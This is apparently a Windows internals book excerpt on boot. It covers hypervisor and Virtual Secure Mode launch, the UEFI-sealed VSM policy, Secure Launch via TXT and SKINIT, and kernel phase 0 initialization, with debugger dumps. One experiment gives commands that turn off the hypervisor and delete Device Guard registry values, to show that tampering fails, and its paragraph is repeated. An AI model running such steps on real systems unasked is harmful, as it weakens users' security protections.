As previously mentioned, the hypervisor setup has two different phases. The first phase begins in Winload, just after the initialization of the NT Loader Block. The HvLoader detects the target platform through some CPUID instructions, copies the UEFI physical memory map, and discovers the IOAPICs and IOMMUs. Then HvLoader loads the correct hypervisor image (and all the dependencies, like the Debugger transport) in memory and checks whether the hypervisor version information matches the one expected. (This explains why the HvLoader couldn't start a different version of Hyper-V.) HvLoader at this stage allocates the hypervisor loader block, an important data structure used for passing system parameters between HvLoader and the hypervisor itself (similar to the Windows loader block). The most important step of phase 1 is the construction of the hypervisor page tables hierarchy. The just-born page tables include only the mapping of the hypervisor image (and its dependencies) and the system physical pages below the first megabyte. The latter are identity-mapped and are used by the startup transitional code (this concept is explained later in this section).
The second phase is initiated in the final stages of Winload: the UEFI firmware boot services have been discarded, so the HvLoader code copies the physical address ranges of the UEFI Runtime Services into the hypervisor loader block; captures the processor state; disables the interrupts, the debugger, and paging; and calls HvlpTransferToHypervisorViaTransitionSpace to transfer the code execution to the below 1 MB physical page. The code located here (the transitional code) can switch the page tables, re-enable paging, and move to the hypervisor code (which actually creates the two different address spaces). After the hypervisor starts, it uses the saved processor context to properly yield back the code execution to Winload in the context of a new virtual machine, called root partition (more details available in Chapter 9).
The launch of the virtual secure mode is divided into three different phases because some steps are required to be done after the hypervisor has started.
1. The first phase is very similar to the first phase in the hypervisor setup. Data is copied from the Windows loader block to the just-allocated VSM loader block; the master key, IDK key, and Crashdump key are generated; and the SecureKernel.exe module is loaded into memory.
2. The second phase is initiated by Winload in the late stages of OslPrepareTarget, where the hypervisor has been already initialized but not launched. Similar to the second phase of the hypervisor setup, the UEFI runtime services physical address ranges are copied into the VSM loader block, along with ACPI tables, code integrity data, the complete system physical memory map, and the hypercall code page. Finally, the second phase constructs the protected page tables hierarchy used for the protected VTL1 memory space (using the OslpVsmBuildPageTables function) and builds the needed GDT.
3. The third phase is the final launch phase. The hypervisor has already been launched. The third phase performs the final checks. (Checks such as whether an IOMMU is present, and
whether the root partition has VSM privileges. The IOMMU is very important for VSM. Refer to Chapter 9 for more information.) This phase also sets the encrypted hypervisor crash dump area, copies the VSM encryption keys, and transfers execution to the Secure Kernel entry point (SkiSystemStartup). The Secure Kernel entry point code runs in VTL 0. VTL 1 is started by the Secure Kernel code in later stages through the HvCallEnablePartitionVtl hypercall. (Read Chapter 9 for more details.)
VSM startup policy
At startup time, the Windows loader needs to determine whether it has to launch the Virtual Secure Mode (VSM). To defeat all the malware attempts to disable this new layer of protection, the system uses a specific policy to seal the VSM startup settings. In the default configurations, at the first boot (after the Windows Setup application has finished copying the Windows files), the Windows Loader uses the OslSetVsmPolicy routine to read and seal the VSM configuration, which is stored in the VSM root registry key HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard.
VSM can be enabled by different sources:
- Device Guard Scenarios. Each scenario is stored as a subkey in the VSM root key. The Enabled DWORD registry value controls whether a scenario is enabled. If one or more scenarios are active, the VSM is enabled.
- Global Settings. Stored in the EnableVirtualizationBasedSecurity registry value.
- Code Integrity policies. Stored in the code integrity policy file (Policy.p7b).
Also, by default, VSM is automatically enabled when the hypervisor is enabled (except if the HyperVVirtualizationBasedSecurityOptOut registry value exists).
Every VSM activation source specifies a locking policy. If the locking mode is enabled, the Windows loader builds a Secure Boot variable, called VbsPolicy, and stores in it the VSM activation mode and the platform configuration. Part of the VSM platform configuration is dynamically generated based on the detected system hardware, whereas another part is read from the RequirePlatformSecurityFeatures registry value stored in the VSM root key. The Secure Boot variable is read at every subsequent boot; the configuration stored in the variable always replaces the configuration located in the Windows registry. In this way, even if malware can modify the Windows Registry to disable VSM, Windows will simply ignore the change and keep the user environment secure. Malware won't be able to modify the VSM Secure Boot variable because, per Secure Boot specification, only a new variable signed by a trusted digital signature can modify or delete the original one. Microsoft provides a special signed tool that could disable the VSM protection. The tool is a special EFI boot application, which sets another signed Secure Boot variable called VbsPolicyDisabled. This variable is recognized at startup time by the Windows Loader. If it exists, Winload deletes the VbsPolicy secure variable and modifies the registry to disable VSM (modifying both the global settings and each Scenario activation).
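The precedence rule (the sealed variable always wins over the registry) can be simulated in a few lines. This Python sketch is illustrative; the value names are simplified stand-ins for the real configuration.

```python
def effective_vsm_config(registry, sealed_variable=None):
    # When the UEFI-locked VbsPolicy variable exists, its settings replace the
    # registry ones, so registry tampering cannot weaken the configuration
    merged = dict(registry)
    merged.update(sealed_variable or {})
    return merged

registry = {"EnableVirtualizationBasedSecurity": 0}    # tampered by malware
vbs_policy = {"EnableVirtualizationBasedSecurity": 1}  # sealed at first boot with UEFI lock

assert effective_vsm_config(registry, vbs_policy)["EnableVirtualizationBasedSecurity"] == 1
assert effective_vsm_config(registry, None)["EnableVirtualizationBasedSecurity"] == 0
```

Without the sealed variable (no UEFI lock), the registry value is authoritative, which matches the behavior observed in the next experiment.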
EXPERIMENT: Understanding the VSM policy
In this experiment, you examine how the Secure Kernel startup is resistant to external tampering. First, enable Virtualization Based Security (VBS) in a compatible edition of Windows (usually the Pro and Business editions work well). On these SKUs, you can quickly verify whether VBS is enabled using Task Manager; if VBS is enabled, you should see a process named Secure System on the Details tab. Even if it's already enabled, check that the UEFI lock is enabled. Type Edit Group Policy (or gpedit.msc) in the Start menu search box, and start the Local Group Policy Editor snap-in. Navigate to Computer Configuration, Administrative Templates, System, Device Guard, and double-click Turn On Virtualization Based Security. Make sure that the policy is set to Enabled and that the options are set as in the following figure:
Make sure that Secure Boot is enabled (you can use the System Information utility or your system BIOS configuration tool to confirm the Secure Boot activation), and restart the system. The Enabled With UEFI Lock option provides antitampering even in an Administrator context. After your system is restarted, disable VBS through the same Group Policy editor (make sure that all the settings are disabled) and by deleting all the registry keys and values located in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard (setting them to 0 produces the same effect). Use the registry editor to properly delete all the values.
Disable the hypervisor by running bcdedit /set {current} hypervisorlaunchtype off from an elevated command prompt. Then restart your computer again. After the system is restarted, even if VBS and hypervisor are expected to be turned off, you should see that the Secure System and LsaIso processes are still present in the Task Manager. This is because the UEFI secure variable VbsPolicy still contains the original policy, so a malicious program or a user could not easily disable the additional layer of protection. To properly confirm this, open the system event viewer by typing eventvwr and navigate to Windows Logs, System. If you scroll through the events, you should see the event that describes the VBS activation type (the event has Kernel-Boot source).
Make sure that Secure Boot is enabled (you can use the System Information utility or your
system BIOS configuration tool to confirm the Secure Boot activation), and restart the system.
The Enabled With UEFI Lock option provides antitampering even in an Administrator context.
After your system is restarted, disable VBS through the same Group policy editor (make sure that all the settings are disabled) and by deleting all the registry keys and values located in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard (setting them to 0 produces the same effect). Use the registry editor to properly delete all the values. Disable the hypervisor by running bcdedit /set {current} hypervisorlaunchtype off from an elevated command prompt. Then restart your computer again. After the system is restarted, even if VBS and the hypervisor are expected to be turned off, you should see that the Secure System and LsaIso processes are still present in Task Manager. This is because the UEFI secure variable VbsPolicy still contains the original policy, so a malicious program or a user could not easily disable the additional layer of protection. To properly confirm this, open the system event viewer by typing eventvwr and navigate to Windows Logs, System. If you scroll between the events, you should see the event that describes the VBS activation type (the event has Kernel-Boot source).
CHAPTER 12 Startup and shutdown
VbsPolicy is a Boot Services–authenticated UEFI variable, so this means it's not visible after the OS switches to Runtime mode. The UefiTool utility, used in the previous experiment, is not able to show these kinds of variables. To properly examine the VbsPolicy variable content, restart your computer again, disable Secure Boot, and use the Efi Shell. The Efi Shell (found in this book's downloadable resources, or downloadable from https://github.com/tianocore/edk2/tree/UDK2018/ShellBinPkg/UefiShell/) must be copied onto a FAT32 USB stick in a file named bootx64.efi located in the \efi\boot path. At this point, you will be able to boot from the USB stick, which will launch the Efi Shell. Run the following command:

dmpstore VbsPolicy -guid 77FA9ABD-0359-4D32-BD60-28F4E78F784B

(77FA9ABD-0359-4D32-BD60-28F4E78F784B is the GUID of the Secure Boot private namespace.)
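Every UEFI variable is identified by the pair (name, vendor GUID), which is why dmpstore takes both arguments. The following Python sketch is purely illustrative (the function name is ours, not part of any firmware tool); it renders that pair in the conventional Name-GUID form:

```python
import uuid

# GUID of the Secure Boot private namespace, as used by the dmpstore command above
SECURE_BOOT_PRIVATE_NAMESPACE = uuid.UUID("77FA9ABD-0359-4D32-BD60-28F4E78F784B")

def efivar_identifier(name: str, vendor_guid: uuid.UUID) -> str:
    """A UEFI variable is uniquely identified by (name, vendor GUID);
    render the pair in the conventional Name-GUID form."""
    return f"{name}-{vendor_guid}"

print(efivar_identifier("VbsPolicy", SECURE_BOOT_PRIVATE_NAMESPACE))
# VbsPolicy-77fa9abd-0359-4d32-bd60-28f4e78f784b
```

Two variables with the same name but different vendor GUIDs are distinct objects to the firmware, which is why the GUID must be supplied explicitly.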
The Secure Launch
If Trusted Execution is enabled (through a specific feature value in the VSM policy) and the system is compatible, Winload enables a new boot path that's a bit different compared to the normal one. This new boot path is called Secure Launch. Secure Launch implements the Intel Trusted Boot (TXT) technology (or SKINIT in AMD64 machines). Trusted Boot is implemented in two components: the boot library and the TcbLaunch.exe file. The boot library, at initialization time, detects that Trusted Boot is enabled and registers a boot callback that intercepts different events: Boot application starting, hash calculation, and Boot application ending. The Windows loader, in the early stages, executes the three stages of Secure Launch setup (from now on, we call the Secure Launch setup the TCB setup) instead of loading the hypervisor.

As previously discussed, the final goal of Secure Launch is to start a secure boot sequence, where the CPU is the only root of trust. To do so, the system needs to get rid of all the firmware dependencies.
Windows achieves this by creating a RAM disk formatted with the FAT file system, which includes Winload, the hypervisor, the VSM module, and all the boot OS components needed to start the system. The Windows loader (Winload) reads TcbLaunch.exe from the system boot disk into memory, using the BlImgLoadBootApplication routine. The latter triggers the three events that the TCB boot callback manages. The callback first prepares the Measured Launch Environment (MLE) for launch, checking the ACM modules and ACPI table and mapping the required TXT regions; then it replaces the boot application entry point with a special TXT MLE routine.

The Windows loader, in the latest stages of the OslExecuteTransition routine, doesn't start the hypervisor launch sequence. Instead, it transfers the execution to the TCB launch sequence, which is quite simple. The TCB boot application is started with the same BlImgStartBootApplication routine described in the previous paragraph. The modified boot application entry point calls the TXT MLE launch routine, which executes the GETSEC(SENTER) TXT instruction. This instruction measures the TcbLaunch.exe executable in memory (TBOOT module), and if the measurement succeeds, the MLE launch routine transfers the code execution to the real boot application entry point (TcbMain).

TcbMain is the first code executed in the Secure Launch environment. The implementation is simple: reinitialize the Boot Library, register an event to receive virtualization launch/resume notifications, and call TcbLoadEntry from the Tcbloader.dll module located in the secure RAM disk. The Tcbloader.dll module is a mini version of the trusted Windows loader. Its goal is to load, verify, and start the hypervisor; set up the hypercall page; and launch the Secure Kernel. The Secure Launch at this stage ends, because the hypervisor and Secure Kernel take care of the verification of the NT kernel and other modules, providing the chain of trust. Execution then returns to the Windows loader, which moves to the Windows kernel through the standard OslArchTransferToKernel routine.

Figure 12-10 shows a scheme of Secure Launch and all its involved components. The user can enable Secure Launch by using the Local Group Policy editor (by tweaking the Turn On Virtualization Based Security setting, which is under Computer Configuration, Administrative Templates, System, Device Guard).
FIGURE 12-10 The Secure Launch scheme. Note that the hypervisor and Secure Kernel start from the RAM disk.
Note The ACM modules of Trusted Boot are provided by Intel and are chipset-dependent. Most of the TXT interface is memory mapped in physical memory. This means that the Hv loader can access even the SINIT region, verify the SINIT ACM version, and update it if needed. Windows achieves this by using a special compressed WIM file (called Tcbres.wim) that contains all the known SINIT ACM modules for each chipset. If needed, the MLE preparation phase opens the compressed file, extracts the right binary module, and replaces the contents of the original SINIT firmware in the TXT region. When the Secure Launch procedure is invoked, the CPU loads the SINIT ACM into secure memory, verifies the integrity of the digital signature, and compares the hash of its public key with the one hardcoded into the chipset.
Secure Launch on AMD platforms
Although Secure Launch is supported on Intel machines thanks to TXT, the Windows 10 Spring 2020 update also supports SKINIT, which is a similar technology designed by AMD for the verifiable startup of trusted software, starting with an initially untrusted operating mode.

SKINIT has the same goal as Intel TXT and is used for the Secure Launch boot flow. It's different from the latter, though: the base of SKINIT is a small piece of software called the secure loader (SL), which in Windows is implemented in the amdsl.bin binary included in the resource section of the Amddrtm.dll library provided by AMD. The SKINIT instruction reinitializes the processor to establish a secure execution environment and starts the execution of the SL in a way that can't be tampered with. The secure loader lives in the Secure Loader Block, a 64-Kbyte structure that is transferred to the TPM by the SKINIT instruction. The TPM measures the integrity of the SL and transfers execution to its entry point.

The SL validates the system state, extends measurements into the PCR, and transfers the execution to the AMD MLE launch routine, which is located in a separate binary included in the TcbLaunch.exe module. The MLE routine initializes the IDT and GDT and builds the page table for switching the processor to long mode. (The MLE in AMD machines is executed in 32-bit protected mode, with the goal of keeping the code in the TCB as small as possible.) It finally jumps back into TcbLaunch, which, as on Intel systems, reinitializes the Boot Library, registers an event to receive virtualization launch/resume notifications, and calls TcbLoadEntry from the Tcbloader.dll module. From now on, the boot flow is identical to the Secure Launch implementation for Intel systems.
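Both flavors of Secure Launch rely on the same measurement primitive: a PCR is never written directly, only extended, so the final value encodes the entire ordered chain of measured components. A minimal Python model of the extend operation follows (illustrative only; the function name is ours, with SHA-256 standing in for the TPM's hash bank):

```python
import hashlib

PCR_SIZE = 32  # size of a SHA-256 PCR bank entry, in bytes

def extend(pcr: bytes, measurement: bytes) -> bytes:
    """TPM-style extend: the new PCR value is the hash of the old value
    concatenated with the digest of the measured component."""
    digest = hashlib.sha256(measurement).digest()
    return hashlib.sha256(pcr + digest).digest()

pcr = b"\x00" * PCR_SIZE                 # PCRs start zeroed at reset
pcr = extend(pcr, b"secure loader")      # e.g., the SL measured via SKINIT
pcr = extend(pcr, b"MLE launch routine") # then the next component in the chain
```

Because each extend folds the previous value in, replaying the same measurements in a different order produces a different final PCR, which is what makes the chain tamper-evident.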
Initializing the kernel and executive subsystems
When Winload calls Ntoskrnl, it passes a data structure called the Loader Parameter block. The Loader Parameter block contains the system and boot partition paths, a pointer to the memory tables Winload generated to describe the system physical memory, a physical hardware tree that is later used to build the volatile HARDWARE registry hive, an in-memory copy of the SYSTEM registry hive, and a pointer to the list of boot drivers Winload loaded. It also includes various other information related to the boot processing performed until this point.
EXPERIMENT: Loader Parameter block
While booting, the kernel keeps a pointer to the Loader Parameter block in the KeLoaderBlock variable. The kernel discards the parameter block after the first boot phase, so the only way to see the contents of the structure is to attach a kernel debugger before booting and break at the initial kernel debugger breakpoint. If you're able to do so, you can use the dt command to dump the block, as shown:
kd> dt poi(nt!KeLoaderBlock) nt!LOADER_PARAMETER_BLOCK
+0x000 OsMajorVersion : 0xa
+0x004 OsMinorVersion : 0
+0x008 Size : 0x160
+0x00c OsLoaderSecurityVersion : 1
+0x010 LoadOrderListHead : _LIST_ENTRY [ 0xfffff800`2278a230 - 0xfffff800`2288c150 ]
+0x020 MemoryDescriptorListHead : _LIST_ENTRY [ 0xfffff800`22949000 - 0xfffff800`22949de8 ]
+0x030 BootDriverListHead : _LIST_ENTRY [ 0xfffff800`22840f50 - 0xfffff800`2283f3e0 ]
+0x040 EarlyLaunchListHead : _LIST_ENTRY [ 0xfffff800`228427f0 - 0xfffff800`228427f0 ]
+0x050 CoreDriverListHead : _LIST_ENTRY [ 0xfffff800`228429a0 - 0xfffff800`228405a0 ]
+0x060 CoreExtensionsDriverListHead : _LIST_ENTRY [ 0xfffff800`2283ff20 - 0xfffff800`22843090 ]
+0x070 TpmCoreDriverListHead : _LIST_ENTRY [ 0xfffff800`22831ad0 - 0xfffff800`22831ad0 ]
+0x080 KernelStack : 0xfffff800`25f5e000
+0x088 Prcb : 0xfffff800`22acf180
+0x090 Process : 0xfffff800`23c819c0
+0x098 Thread : 0xfffff800`23c843c0
+0x0a0 KernelStackSize : 0x6000
+0x0a4 RegistryLength : 0xb80000
+0x0a8 RegistryBase : 0xfffff800`22b49000 Void
+0x0b0 ConfigurationRoot : 0xfffff800`22783090 _CONFIGURATION_COMPONENT_DATA
+0x0b8 ArcBootDeviceName : 0xfffff800`22785290 "multi(0)disk(0)rdisk(0)partition(4)"
+0x0c0 ArcHalDeviceName : 0xfffff800`22785190 "multi(0)disk(0)rdisk(0)partition(2)"
+0x0c8 NtBootPathName : 0xfffff800`22785250 "\WINDOWS\"
+0x0d0 NtHalPathName : 0xfffff800`22782bd0 "\"
+0x0d8 LoadOptions : 0xfffff800`22772c80 "KERNEL=NTKRNLMP.EXE NOEXECUTE=OPTIN
HYPERVISORLAUNCHTYPE=AUTO DEBUG ENCRYPTION_KEY=**** DEBUGPORT=NET
HOST_IP=192.168.18.48 HOST_PORT=50000 NOVGA"
+0x0e0 NlsData : 0xfffff800`2277a450 _NLS_DATA_BLOCK
+0x0e8 ArcDiskInformation : 0xfffff800`22785e30 _ARC_DISK_INFORMATION
+0x0f0 Extension : 0xfffff800`2275cf90 _LOADER_PARAMETER_EXTENSION
+0x0f8 u : <unnamed-tag>
+0x108 FirmwareInformation : _FIRMWARE_INFORMATION_LOADER_BLOCK
+0x148 OsBootstatPathName : (null)
+0x150 ArcOSDataDeviceName : (null)
+0x158 ArcWindowsSysPartName : (null)
Additionally, you can use the !loadermemorylist command on the MemoryDescriptorListHead field to dump the physical memory ranges:

kd> !loadermemorylist 0xfffff800`22949000
Base       Length     Type
0000000001 0000000005 (26) HALCachedMemory   ( 20 Kb )
0000000006 000000009a ( 5) FirmwareTemporary ( 616 Kb )
...
0000001304 0000000001 ( 7) OsloaderHeap      ( 4 Kb )
0000001305 0000000081 ( 5) FirmwareTemporary ( 516 Kb )
0000001386 000000001c (20) MemoryData        ( 112 Kb )
...
0000001800 0000000b80 (19) RegistryData      ( 11 Mb 512 Kb )
0000002380 00000009fe ( 9) SystemCode        ( 9 Mb 1016 Kb )
0000002d7e 0000000282 ( 2) Free              ( 2 Mb 520 Kb )
0000003000 0000000391 ( 9) SystemCode        ( 3 Mb 580 Kb )
0000003391 0000000068 (11) BootDriver        ( 416 Kb )
00000033f9 0000000257 ( 2) Free              ( 2 Mb 348 Kb )
0000003650 00000008d2 ( 5) FirmwareTemporary ( 8 Mb 840 Kb )
000007ffc9 0000000026 (31) FirmwareData      ( 152 Kb )
000007ffef 0000000004 (32) FirmwareReserved  ( 16 Kb )
000007fff3 000000000c ( 6) FirmwarePermanent ( 48 Kb )
000007ffff 0000000001 ( 5) FirmwareTemporary ( 4 Kb )

NumberOfDescriptors: 90

Summary
Memory Type       Pages
Free              000007a89c ( 501916) ( 1 Gb 936 Mb 624 Kb )
LoadedProgram     0000000370 ( 880)    ( 3 Mb 448 Kb )
FirmwareTemporary 0000001fd4 ( 8148)   ( 31 Mb 848 Kb )
FirmwarePermanent 000000030e ( 782)    ( 3 Mb 56 Kb )
OsloaderHeap      0000000275 ( 629)    ( 2 Mb 468 Kb )
SystemCode        0000001019 ( 4121)   ( 16 Mb 100 Kb )
BootDriver        000000115a ( 4442)   ( 17 Mb 360 Kb )
RegistryData      0000000b88 ( 2952)   ( 11 Mb 544 Kb )
MemoryData        0000000098 ( 152)    ( 608 Kb )
NlsData           0000000023 ( 35)     ( 140 Kb )
HALCachedMemory   0000000005 ( 5)      ( 20 Kb )
FirmwareCode      0000000008 ( 8)      ( 32 Kb )
FirmwareData      0000000075 ( 117)    ( 468 Kb )
FirmwareReserved  0000000044 ( 68)     ( 272 Kb )
                  ========== ==========
Total             000007FFDF ( 524255) = ( ~2047 Mb )
The Loader Parameter extension can show useful information about the system hardware, CPU features, and boot type:

kd> dt poi(nt!KeLoaderBlock) nt!LOADER_PARAMETER_BLOCK Extension
+0x0f0 Extension : 0xfffff800`2275cf90 _LOADER_PARAMETER_EXTENSION
kd> dt 0xfffff800`2275cf90 _LOADER_PARAMETER_EXTENSION
nt!_LOADER_PARAMETER_EXTENSION
+0x000 Size : 0xc48
+0x004 Profile : _PROFILE_PARAMETER_BLOCK
+0x018 EmInfFileImage : 0xfffff800`25f2d000 Void
...
+0x068 AcpiTable : (null)
+0x070 AcpiTableSize : 0
+0x074 LastBootSucceeded : 0y1
+0x074 LastBootShutdown : 0y1
+0x074 IoPortAccessSupported : 0y1
+0x074 BootDebuggerActive : 0y0
+0x074 StrongCodeGuarantees : 0y0
+0x074 HardStrongCodeGuarantees : 0y0
+0x074 SidSharingDisabled : 0y0
+0x074 TpmInitialized : 0y0
+0x074 VsmConfigured : 0y0
+0x074 IumEnabled : 0y0
+0x074 IsSmbboot : 0y0
+0x074 BootLogEnabled : 0y0
+0x074 FeatureSettings : 0y0000000 (0)
+0x074 FeatureSimulations : 0y000000 (0)
+0x074 MicrocodeSelfHosting : 0y0
...
+0x900 BootFlags : 0
+0x900 DbgMenuOsSelection : 0y0
+0x900 DbgHiberBoot : 0y1
+0x900 DbgSoftRestart : 0y0
+0x908 InternalBootFlags : 2
+0x908 DbgUtcBootTime : 0y0
+0x908 DbgRtcBootTime : 0y1
+0x908 DbgNoLegacyServices : 0y0
Ntoskrnl then begins phase 0, the first of its two-phase initialization process (phase 1 is the second). Most executive subsystems have an initialization function that takes a parameter that identifies which phase is executing.

During phase 0, interrupts are disabled. The purpose of this phase is to build the rudimentary structures required to allow the services needed in phase 1 to be invoked. Ntoskrnl's startup function, KiSystemStartup, is called in each system processor context (more details later in this chapter in the "Kernel initialization phase 1" section). It initializes the processor boot structures and sets up a Global Descriptor Table (GDT) and Interrupt Descriptor Table (IDT). If called from the boot processor, the startup routine initializes the Control Flow Guard (CFG) check functions and cooperates with the memory manager to initialize KASLR. The KASLR initialization should be done in the early stages of the system startup; in this way, the kernel can assign random VA ranges for the various virtual memory regions (such as the PFN database and system PTE regions; more details about KASLR are available in the "Image randomization" section of Chapter 5, Part 1). KiSystemStartup also initializes the kernel debugger, the XSAVE processor area, and, where needed, KVA Shadow. It then calls KiInitializeKernel. If KiInitializeKernel is running on the boot CPU, it performs systemwide kernel initialization, such as initializing internal lists and other data structures that all CPUs share. It builds and compacts the System Service Descriptor table (SSDT) and calculates the random values for the internal KiWaitAlways and KiWaitNever values, which are used for kernel pointer encoding. It also checks whether virtualization has been started; if it has, it maps the hypercall page and starts the processor's enlightenments (more details about the hypervisor enlightenments are available in Chapter 9).
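The pointer-encoding idea behind those per-boot random values can be sketched as follows. This is an illustrative model only: the variable names are borrowed from the text, but the actual transformation ntoskrnl applies is an implementation detail that may differ from this XOR-and-rotate scheme:

```python
import secrets

MASK = (1 << 64) - 1

# Illustrative stand-ins for the per-boot random cookies the kernel computes.
KI_WAIT_NEVER = secrets.randbits(64)
KI_WAIT_ALWAYS = secrets.randbits(64)

def _rol64(v: int, n: int) -> int:
    n &= 63
    return ((v << n) | (v >> (64 - n))) & MASK

def _ror64(v: int, n: int) -> int:
    n &= 63
    return ((v >> n) | (v << (64 - n))) & MASK

def encode_pointer(ptr: int) -> int:
    """XOR with one cookie, rotate by an amount derived from the other:
    without both per-boot values an attacker cannot forge a valid pointer."""
    return _rol64(ptr ^ KI_WAIT_NEVER, KI_WAIT_ALWAYS) ^ KI_WAIT_ALWAYS

def decode_pointer(enc: int) -> int:
    """Inverse transformation, applied by the kernel before dereferencing."""
    return _ror64(enc ^ KI_WAIT_ALWAYS, KI_WAIT_ALWAYS) ^ KI_WAIT_NEVER

ptr = 0xFFFFF8002278A230
assert decode_pointer(encode_pointer(ptr)) == ptr
```

Because the cookies are regenerated at every boot, an encoded pointer leaked from one boot session is useless in the next.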
KiInitializeKernel, if executed by compatible processors, has the important role of initializing and enabling the Control-flow Enforcement Technology (CET). This hardware feature is relatively new and basically implements a hardware shadow stack, used to detect and prevent ROP attacks. The technology is used for protecting both user-mode applications and kernel-mode drivers (only when VSM is available). KiInitializeKernel initializes the Idle process and thread and calls ExpInitializeExecutive. KiInitializeKernel and ExpInitializeExecutive are normally executed on each system processor. When
executed by the boot processor, ExpInitializeExecutive relies on the function responsible for orchestrating phase 0, InitBootProcessor, while subsequent processors call only InitOtherProcessors.

Note Return-oriented programming (ROP) is an exploitation technique in which an attacker gains control of the call stack of a program with the goal of hijacking its control flow and executes carefully chosen machine instruction sequences, called "gadgets," that are already present in the machine's memory. Chained together, multiple gadgets allow an attacker to perform arbitrary operations on a machine.
InitBootProcessor starts by validating the boot loader. If the boot loader version used to launch Windows doesn't correspond to the right Windows kernel, the function crashes the system with a LOADER_BLOCK_MISMATCH bugcheck code (0x100). Otherwise, it initializes the pool look-aside pointers for the initial CPU and checks for and honors the BCD burnmemory boot option, where it discards the amount of physical memory the value specifies. It then performs enough initialization of the NLS files that were loaded by Winload (described earlier) to allow Unicode to ANSI and OEM translation to work. Next, it continues by initializing the Windows Hardware Error Architecture (WHEA) and calling the HAL function HalInitSystem, which gives the HAL a chance to gain system control before Windows performs significant further initialization. HalInitSystem is responsible for initializing and starting various components of the HAL, like ACPI tables, debugger descriptors, DMA, firmware, I/O MMU, System Timers, CPU topology, performance counters, and the PCI bus. One important duty of HalInitSystem is to prepare each CPU interrupt controller to receive interrupts and to configure the interval clock timer interrupt, which is used for CPU time accounting. (See the section "Quantum" in Chapter 4, "Threads," in Part 1 for more on CPU time accounting.)
When HalInitSystem exits, InitBootProcessor proceeds by computing the reciprocal for clock timer expiration. Reciprocals are used for optimizing divisions on most modern processors. They can perform multiplications faster, and because Windows must divide the current 64-bit time value in order to find out which timers need to expire, this static calculation reduces interrupt latency when the clock interval fires. InitBootProcessor uses a helper routine, InitSystem, to fetch registry values from the control vector of the SYSTEM hive. This data structure contains more than 150 kernel-tuning options that are part of the HKLM\SYSTEM\CurrentControlSet\Control registry key, including information such as the licensing data and version information for the installation. All the settings are preloaded and stored in global variables. InitBootProcessor then continues by setting up the system root path and searching the kernel image for the crash message strings it displays on blue screens, caching their location to avoid looking them up during a crash, which could be dangerous and unreliable. Next, InitBootProcessor initializes the timer subsystem and the shared user data page.
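The reciprocal trick works because division by a constant can be replaced by multiplication by a precomputed, scaled reciprocal followed by a shift. A small sketch (the constant below is the textbook value for dividing a 32-bit integer by 10; it is not a value the kernel actually stores):

```python
# Precomputed reciprocal: ceil(2**35 / 10) == 0xCCCCCCCD.
# Multiplying by it and shifting right by 35 gives exact n // 10
# for every 32-bit n, using only a multiply and a shift.
RECIP_10 = (2**35 + 9) // 10

def div10(n: int) -> int:
    """Divide a 32-bit unsigned value by 10 without a division instruction."""
    return (n * RECIP_10) >> 35

for n in (0, 1, 9, 10, 123456789, 2**32 - 1):
    assert div10(n) == n // 10
```

On real hardware the multiply-high-and-shift sequence completes in a few cycles, whereas an integer divide can take dozens, which is exactly why the kernel precomputes such reciprocals once at boot.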
InitBootProcessor is now ready to call the phase 0 initialization routines for the executive, Driver Verifier, and the memory manager. These components perform the following initialization tasks:

1. The executive initializes various internal locks, resources, lists, and variables and validates that the product suite type in the registry is valid, discouraging casual modification of the registry to upgrade to an SKU of Windows that was not actually purchased. This is only one of the many such checks in the kernel.
2. Driver Verifier, if enabled, initializes various settings and behaviors based on the current state of the system (such as whether safe mode is enabled) and verification options. It also picks which drivers to target for tests that target randomly chosen drivers.

3. The memory manager constructs the page tables, PFN database, and internal data structures that are necessary to provide basic memory services. It also enforces the limit of the maximum supported amount of physical memory and builds and reserves an area for the system file cache. It then creates memory areas for the paged and nonpaged pools (described in Chapter 5 in Part 1). Other executive subsystems, the kernel, and device drivers use these two memory pools for allocating their data structures. It finally creates the UltraSpace, a 16 TB region that provides support for fast and inexpensive page mapping that doesn't require TLB flushing.
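As a rough illustration of why the PFN database in step 3 scales with installed RAM (the entry size below is an approximation for illustration; the real _MMPFN layout varies between releases):

```python
PAGE_SIZE = 4096        # standard x64 small page
PFN_ENTRY_SIZE = 48     # assumed size of one PFN entry; varies by build

def pfn_database_size(physical_bytes: int) -> int:
    """The memory manager needs one PFN entry per physical page,
    so the database grows linearly with installed RAM."""
    pages = physical_bytes // PAGE_SIZE
    return pages * PFN_ENTRY_SIZE

# For a ~2 GB machine like the one in the experiment above:
ram = 2 * 1024**3
print(pfn_database_size(ram) // 1024**2, "MiB")  # 24 MiB
```

This is why the database is allocated early, from a randomized VA range reserved during KASLR setup, rather than grown on demand.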
Next, InitBootProcessor enables the hypervisor CPU dynamic partitioning (if enabled and correctly licensed) and calls HalInitializeBios to set up the old BIOS emulation code part of the HAL. This code is used to allow access (or to emulate access) to 16-bit real mode interrupts and memory, which are used mainly by Bootvid (this driver has been replaced by BGFX but still exists for compatibility reasons).

At this point, InitBootProcessor enumerates the boot-start drivers that were loaded by Winload and calls DbgLoadImageSymbols to inform the kernel debugger (if attached) to load symbols for each of these drivers. If the host debugger has configured the break on symbol load option, this will be the earliest point for a kernel debugger to gain control of the system. InitBootProcessor now calls HvlPhase1Initialize, which performs the remaining HVL initialization that hasn't been possible to complete in previous phases. When the function returns, it calls HeadlessInit to initialize the serial console if the machine was configured for Emergency Management Services (EMS).
Next, InitBootProcessor builds the versioning information that will be used later in the boot process, such as the build number, service pack version, and beta version status. Then it copies the NLS tables that Winload previously loaded into the paged pool, reinitializes them, and creates the kernel stack trace database if the global flags specify creating one. (For more information on the global flags, see Chapter 6, "I/O system," in Part 1.)

Finally, InitBootProcessor calls the object manager, security reference monitor, process manager, user-mode debugging framework, and Plug and Play manager. These components perform the following initialization steps:
1. During the object manager initialization, the objects that are necessary to construct the object manager namespace are defined so that other subsystems can insert objects into it. The system process and the global kernel handle tables are created so that resource tracking can begin. The value used to encrypt the object header is calculated, and the Directory and SymbolicLink object types are created.

2. The security reference monitor initializes security global variables (like the system SIDs and Privilege LUIDs) and the in-memory database, and it creates the token type object. It then creates and prepares the first local system account token for assignment to the initial process. (See Chapter 7 in Part 1 for a description of the local system account.)

3. The process manager performs most of its initialization in phase 0, defining the process, thread, job, and partition object types and setting up lists to track active processes and threads. The
